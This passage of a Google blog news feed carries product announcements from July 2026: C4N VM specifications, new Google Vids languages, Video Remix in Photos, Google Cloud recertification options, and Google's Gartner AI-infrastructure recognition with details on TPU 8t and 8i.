&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td rowspan="2" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Name&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td rowspan="2" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;vCPUs&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td rowspan="2" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Memory&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;(GB)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td rowspan="2" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Local Storage&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;(GiB)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td colspan="2" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Network Bandwidth&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td rowspan="2" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hyperdisk Extreme Bandwidth&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;(MiB/s)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td rowspan="2" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hyperdisk&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Extreme &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt; IOPS&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;VM-VM&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;(Gbps)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;VM-Internet&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;(Gbps)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;C4n-highcpu&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2 - 192&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;4 - 384&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;N/A&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;25 - 400&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;7 - 200&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1.000 - 25,000&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;80,000 - 1M&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;C4n-standard&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2 - 192&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;7 - 720&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;N/A&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;25 - 400&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;7 - 200&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1.000 - 25,000&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;80,000 - 1M&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;C4n-standard-lssd&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;4 - 192&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;15 - 720&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;375 - 12,000&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;30 - 400&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;7 - 200&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1.000 - 25,000&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;100,000 - 1M &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;C4n-highmem&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2 - 192&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;15 - 1,488&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;N/A&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;25 - 400&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;7 - 200&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1.000 - 25,000&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;80,000 - 1M &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;C4n-highmem-lssd&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;4 - 192&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;31 - 1,488&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;375 - 12,000&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;30 - 400&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;7 - 200&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1.000 - 25,000&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;100,000 - 1M &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;C4N machine series performance and specifications&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3 style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;How to get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Whether you’re hosting heavy-duty distributed databases, running network virtualization appliances, or orchestrating large-scale data pipelines for AI, C4N is engineered to provide the throughput, scale, and efficiency your business demands. C4N instances are now generally available via on-demand, as Spot VMs, and via reservations. You can also take advantage of further cost savings by purchasing Committed Use Discounts (CUDs) or FlexCUDs in one- and three-year terms in the us-central1 (Iowa), us-east1 (South Carolina), us-east5 (Ohio), us-west1 (Oregon) and europe-west2 (London). For more information visit&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/network-optimized-machines"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Network Optimized Machine Type&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to establish a high-performance launchpad for innovation? Head straight to the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/"&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to &lt;/span&gt;&lt;a href="https://console.cloud.google.com/compute/instancesAdd" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;spin up a C4N VM&lt;/span&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;under the “Network Optimized” machine family. Stay up-to-date on regional availability by visiting our&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://cloud.google.com/compute/docs/regions-zones"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;regions and zones page&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or contact your Google Cloud sales representative for more information.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/compute/c4n-network-and-storage-optimized-vms" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-08T20:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/convert-your-google-slides-to-videos-in-7-additional-languages.html</id>
    <title>Convert your Google Slides to videos in 7 additional languages</title>
    <updated>2026-07-08T17:17:49+00:00</updated>
    <content type="html">&lt;p&gt;&lt;a href="https://docs.google.com/videos/create?usp=blog" target="_blank"&gt;Google Vids&lt;/a&gt; already lets you &lt;a href="https://support.google.com/docs/answer/15577408?hl=en-GB" target="_blank"&gt;convert your Slides content into Vids&lt;/a&gt; with AI-generated scripts, voiceovers, background music, and animations for presentations and accounts in English.&lt;/p&gt;&lt;p&gt;We’re now expanding support to French, German, Italian, Japanese, Korean, Portuguese, and Spanish.&amp;nbsp;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no end user setting for this feature. Visit the Help Center to learn more about &lt;a href="https://support.google.com/docs/answer/15577408?hl=en" target="_blank"&gt;converting Google Slides into Google Vids&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) started on June 30, 2026&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains:&lt;/a&gt; Full rollout (1–3 days for feature visibility) starting on July 20, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education:&lt;/b&gt; Education Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer:&lt;/b&gt; Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions: &lt;/b&gt;Enterprise Essentials and Enterprise Essentials Plus; Nonprofits&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Google AI Pro for Education; Teaching and Learning&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons:&lt;/b&gt; AI Expanded Access&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Help: &lt;a href="https://support.google.com/docs/answer/15577408" target="_blank"&gt;Convert Google Slides into Google Vids&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/convert-your-google-slides-to-videos-in-7-additional-languages.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-08T17:17:49+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/photos/video-remix</id>
    <title>Create shareable video clips in seconds with Video Remix in Google Photos.</title>
    <updated>2026-07-08T17:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/05_Google_Photo_Video_Remix_Soc.max-600x600.format-webp.webp" /&gt;With Video Remix in Google Photos, you can transform ordinary videos into share-worthy moments in just a few taps.</content>
    <link href="https://blog.google/products-and-platforms/products/photos/video-remix" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-08T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/training-certifications/new-ways-keep-google-cloud-certifications-current</id>
    <title>New ways to keep Google Cloud certifications current and boost your career</title>
    <updated>2026-07-08T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you’re reading this, you’ve likely already done the hard work to prove your qualifications with a Google Cloud certification. And good for you — research shows that’ll help you get ahead. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Certified individuals report more responses from recruiters, faster promotions, and higher salaries. In fact, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;81% of organizations say certifications from Google Cloud increase their confidence in a job candidate's knowledge or ability.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But the pace of change in cloud technology today means getting certified once isn’t enough. The average half-life of a skill used to be about 6 years; &lt;/span&gt;&lt;a href="https://hbr.org/2023/09/reskilling-in-the-age-of-ai" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;today, it’s about 2.5&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, according to Harvard Business Review research. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;That’s why recertification matters more than ever. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;And thanks to some new technological approaches, we’re making it easier than ever to keep those certifications up to date. Tools like skill badges and work-based training are just some of the ways we’re recognizing the progress you’ve already made.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Moving beyond the exam &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We know that the traditional recertification model — studying for a multi-hour, proctored exam every two years — is a significant commitment of time and resources. And let’s face it: Exams are stressful. You need your skills to stay current. But you need a better, more flexible way to prove it.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;That’s why we’re transforming the recertification process. You can now use &lt;/span&gt;&lt;a href="http://skills.google.com" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Skills&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to take up-to-date courses and skill badges to renew your Google Cloud credential. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get recertified today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Skills now lets you select the most vital courses and skill badges behind each certification so that you can prioritize specific products and competencies most aligned to your role.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Deepen your knowledge with select courses&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: If you want to brush up on new topics, you can take the latest courses and labs to learn what’s changed.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Fast track with skill badges:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; If you’re already using new cloud technologies in your daily job, you can jump straight to skill badges. Earning a skill badge entails interactive, hands-on labs that validate your ability to apply your knowledge to a real-world problem. The practical approach of skills badges helps you recertify faster than taking courses.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This &lt;/span&gt;&lt;a href="https://support.google.com/cloud-certification/answer/9907853?hl=en&amp;amp;sjid=9339123245113190165-NA" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;streamlined recertification opportunity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is now available to individuals holding the following certifications: Cloud Digital Leader, Associate Cloud Engineer, Professional Cloud Architect, and Professional Data Engineer.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once you’ve completed the required activities while your certifications are active, your certification will automatically be extended by one year. You can learn whatever helps your career the most, whenever you have the time. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Your living credential&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In a fast-moving job market, an active certification is a living credential. It tells employers not just what you knew once, maybe even years ago — but that you’re ready for any challenge you’ll face today. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Keep your career growing and get recertified through this new program today on &lt;/span&gt;&lt;a href="http://skills.google.com" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Skills&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/training-certifications/new-ways-keep-google-cloud-certifications-current" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-08T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/ai-infrastructure/google-is-a-leader-in-gartner-magic-quadrant-for-ai-infra</id>
    <title>Google Cloud named Leader in the 2026 Gartner® Magic Quadrant™ for AI Infrastructure</title>
    <updated>2026-07-08T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the agentic era, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AI is evolving from answering questions to reasoning and taking action. Companies who want to lead in this next phase of AI need computing infrastructure that’s designed and optimized for these new requirements, helping&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; them innovate faster, deliver compelling user and customer experiences, and optimize for cost and energy efficiency — all at massive scale.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Today, we are pleased to announce that Google has been named a Leader in the inaugural Gartner&lt;sup&gt;Ⓡ&lt;/sup&gt; Magic Quadrant™ for AI Infrastructure, positioned highest for ‘Ability to Execute’ and furthest for ‘Completeness of Vision’. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We believe&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;their findings validate our dedication to solving these challenges internally and for our customers.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_05vW3xz.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Read the full report: &lt;a href="https://cloud.google.com/resources/content/2026-gartner-mq-ai-infrastructure"&gt;2026 Gartner Magic Quadrant™ for AI Infrastructure&lt;/a&gt;&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Building on the infrastructure foundation powering Gemini&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today’s model and serving architectures require a fundamental rethinking of how silicon and software interact. We realized early on that the platform we envisioned couldn’t be bought off the shelf — we had to invent it. For over a decade, our infrastructure engineers and Google DeepMind researchers have worked shoulder to shoulder to co-design the entire stack for Gemini, YouTube, and Search. We make those innovations, together with popular third party and open source software, available to our customers through Google Cloud. Today our integrated stack serves 9 out of 10 frontier AI labs; capital markets firms like Citadel Securities; and enterprises like Mercedes Benz.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At the hardware layer, Gartner recognized our commitment to custom silicon as a core strength. Earlier this year we shared two new advancements in custom silicon, our 8th generation TPUs, engineered to solve enterprise scaling and memory bottlenecks at a systems level: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;TPU 8t, the training powerhouse:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Purpose-built to optimize training timelines, TPU 8t packs 9,600 chips into a single superpod, delivering the high-density compute required for frontier models with nearly 3x the compute performance per pod over the previous generation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;TPU 8i, the inference engine: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Engineered to handle the collaborative, iterative work of specialized agents, TPU 8i breaks the memory wall for real-time agentic workflows, with 288 GB of high-bandwidth memory and 384 MB of on-chip SRAM — 3x more than the previous generation — keeping a model's active working set entirely on-chip.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While our TPU platforms push the boundaries of what is possible, we know that one size doesn't fit all. Different customers have different workloads, different requirements, and different use cases. So, we also partner deeply with NVIDIA to deliver the latest accelerated computing platforms as highly performant, reliable and scalable services in Google Cloud. We will be among the first to deliver A5X instances based on the next-generation Vera Rubin platform when it becomes available later this year, enabling customer choice. We also work closely with NVIDIA to integrate GPUs into many Google Cloud software services to give our customers easier access to accelerated computing.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To enable even more flexibility, we continue to contribute to open-source projects across the orchestration, inference engines, and framework layers through llm-d and vLLM. We also recently announced TorchTPU, which gives PyTorch developers portability without complex code rewrites while maximizing the performance of their deployment. &lt;/span&gt;&lt;/p&gt;
